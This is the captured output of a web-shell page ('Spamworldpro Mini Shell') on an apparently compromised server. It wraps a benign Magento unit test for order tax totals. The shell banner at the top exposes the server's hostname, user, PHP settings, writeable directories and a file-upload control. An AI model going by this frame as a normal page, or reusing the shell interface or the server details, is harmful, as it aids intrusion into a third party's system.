Spamworldpro Mini Shell
Spamworldpro


Server : Apache
System : Linux server2.corals.io 4.18.0-348.2.1.el8_5.x86_64 #1 SMP Mon Nov 15 09:17:08 EST 2021 x86_64
User : corals ( 1002)
PHP Version : 7.4.33
Disable Function : exec,passthru,shell_exec,system
Directory :  /home/corals/old/vendor/magento/module-sales/Test/Unit/Block/Adminhtml/Order/Totals/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /home/corals/old/vendor/magento/module-sales/Test/Unit/Block/Adminhtml/Order/Totals/TaxTest.php
<?php
/**
 * Copyright © Magento, Inc. All rights reserved.
 * See COPYING.txt for license details.
 */
declare(strict_types=1);

namespace Magento\Sales\Test\Unit\Block\Adminhtml\Order\Totals;

use Magento\Framework\TestFramework\Unit\Helper\ObjectManager;
use Magento\Sales\Block\Adminhtml\Order\Totals\Tax;
use Magento\Sales\Model\Order;
use Magento\Sales\Model\Order\Creditmemo;
use Magento\Sales\Model\Order\Invoice;
use Magento\Tax\Helper\Data;
use Magento\Tax\Model\ResourceModel\Sales\Order\Tax\Collection;
use Magento\Tax\Model\Sales\Order\Tax as TaxModel;
use Magento\Tax\Model\Sales\Order\TaxFactory;
use PHPUnit\Framework\MockObject\MockObject;
use PHPUnit\Framework\TestCase;

/**
 * Test for \Magento\Sales\Block\Adminhtml\Order\Totals\Tax
 */
class TaxTest extends TestCase
{
    /**
     * @var array
     */
    private $calculatedData = [
        'tax' => 'tax',
        'shipping_tax' => 'shipping_tax',
    ];

    /**
     * @var MockObject|Tax
     */
    private $taxMock;

    /**
     * @var Data|MockObject
     */
    private $taxHelperMock;

    /**
     * @var TaxFactory|MockObject
     */
    private $taxOrderFactory;

    /**
     * @inheridoc
     */
    protected function setUp(): void
    {
        $this->taxHelperMock = $this->getMockBuilder(Data::class)
            ->onlyMethods(['getCalculatedTaxes'])
            ->disableOriginalConstructor()
            ->getMock();

        $this->taxOrderFactory = $this->createMock(TaxFactory::class);

        $arguments = $this->getModelArguments(
            ['taxHelper' => $this->taxHelperMock, 'taxOrderFactory' => $this->taxOrderFactory]
        );
        $this->taxMock = $this->getMockBuilder(Tax::class)
            ->setConstructorArgs($arguments)
            ->onlyMethods(['getOrder', 'getSource'])
            ->getMock();
    }

    /**
     * Test method for getFullTaxInfo
     *
     * @param Order|null $source
     * @param array $expectedResult
     * @return void
     *
     * @dataProvider getFullTaxInfoDataProvider
     */
    public function testGetFullTaxInfo(?Order $source, array $expectedResult): void
    {
        $this->taxHelperMock->expects($this->any())
            ->method('getCalculatedTaxes')
            ->willReturn($this->calculatedData);
        $this->taxMock->expects($this->once())
            ->method('getOrder')
            ->willReturn($source);

        $actualResult = $this->taxMock->getFullTaxInfo();
        $this->assertSame($expectedResult, $actualResult);
    }

    /**
     * Test method for getFullTaxInfo with invoice or creditmemo
     *
     * @param Invoice|Creditmemo $source
     * @param array $expectedResult
     * @return void
     *
     * @dataProvider getCreditAndInvoiceFullTaxInfoDataProvider
     */
    public function testGetFullTaxInfoWithCreditAndInvoice($source, array $expectedResult): void
    {
        $this->taxHelperMock->expects($this->any())
            ->method('getCalculatedTaxes')
            ->willReturn($this->calculatedData);
        $this->taxMock->expects($this->once())
            ->method('getSource')
            ->willReturn($source);

        $actualResult = $this->taxMock->getFullTaxInfo();
        $this->assertSame($expectedResult, $actualResult);
    }

    /**
     * Test method for getFullTaxInfo when order doesn't have tax
     *
     * @return void
     */
    public function testGetFullTaxInfoOrderWithoutTax(): void
    {
        $this->taxHelperMock->expects($this->once())
            ->method('getCalculatedTaxes')
            ->willReturn(null);

        $orderMock = $this->createMock(Order::class);
        $taxCollection = $this->createMock(Collection::class);
        $taxCollection->expects($this->once())
            ->method('loadByOrder')
            ->with($orderMock)
            ->willReturnSelf();
        $taxCollection->expects($this->once())
            ->method('toArray')
            ->willReturn(['items' => []]);

        $taxOrder = $this->createMock(TaxModel::class);
        $taxOrder->expects($this->once())
            ->method('getCollection')
            ->willReturn($taxCollection);
        $this->taxOrderFactory->expects($this->once())
            ->method('create')
            ->willReturn($taxOrder);

        $invoiceMock = $this->createMock(Invoice::class);
        $this->taxMock->expects($this->once())
            ->method('getSource')
            ->willReturn($invoiceMock);
        $this->taxMock->expects($this->once())
            ->method('getOrder')
            ->willReturn($orderMock);

        $this->assertNull($this->taxMock->getFullTaxInfo());
    }

    /**
     * Provide the tax helper mock as a constructor argument
     *
     * @param array $arguments
     * @return array
     */
    private function getModelArguments(array $arguments): array
    {
        $objectManagerHelper = new ObjectManager($this);

        return $objectManagerHelper->getConstructArguments(Tax::class, $arguments);
    }

    /**
     * Data provider.
     * 1st Case : $source is not an instance of \Magento\Sales\Model\Order
     * 2nd Case : getCalculatedTaxes and getShippingTax return value
     *
     * @return array
     */
    public function getFullTaxInfoDataProvider(): array
    {
        $salesModelOrderMock = $this->createMock(Order::class);

        return [
            'source is not an instance of \Magento\Sales\Model\Order' => [null, []],
            'source is an instance of \Magento\Sales\Model\Order and has reasonable data' => [
                $salesModelOrderMock,
                $this->calculatedData,
            ]
        ];
    }

    /**
     * Data provider.
     * 1st Case : $current an instance of \Magento\Sales\Model\Invoice
     * 2nd Case : $current an instance of \Magento\Sales\Model\Creditmemo
     *
     * @return array
     */
    public function getCreditAndInvoiceFullTaxInfoDataProvider(): array
    {
        $invoiceMock = $this->createMock(Invoice::class);
        $creditMemoMock = $this->createMock(Creditmemo::class);

        return [
            'invoice' => [$invoiceMock, $this->calculatedData],
            'creditMemo' => [$creditMemoMock, $this->calculatedData]
        ];
    }
}

Spamworldpro Mini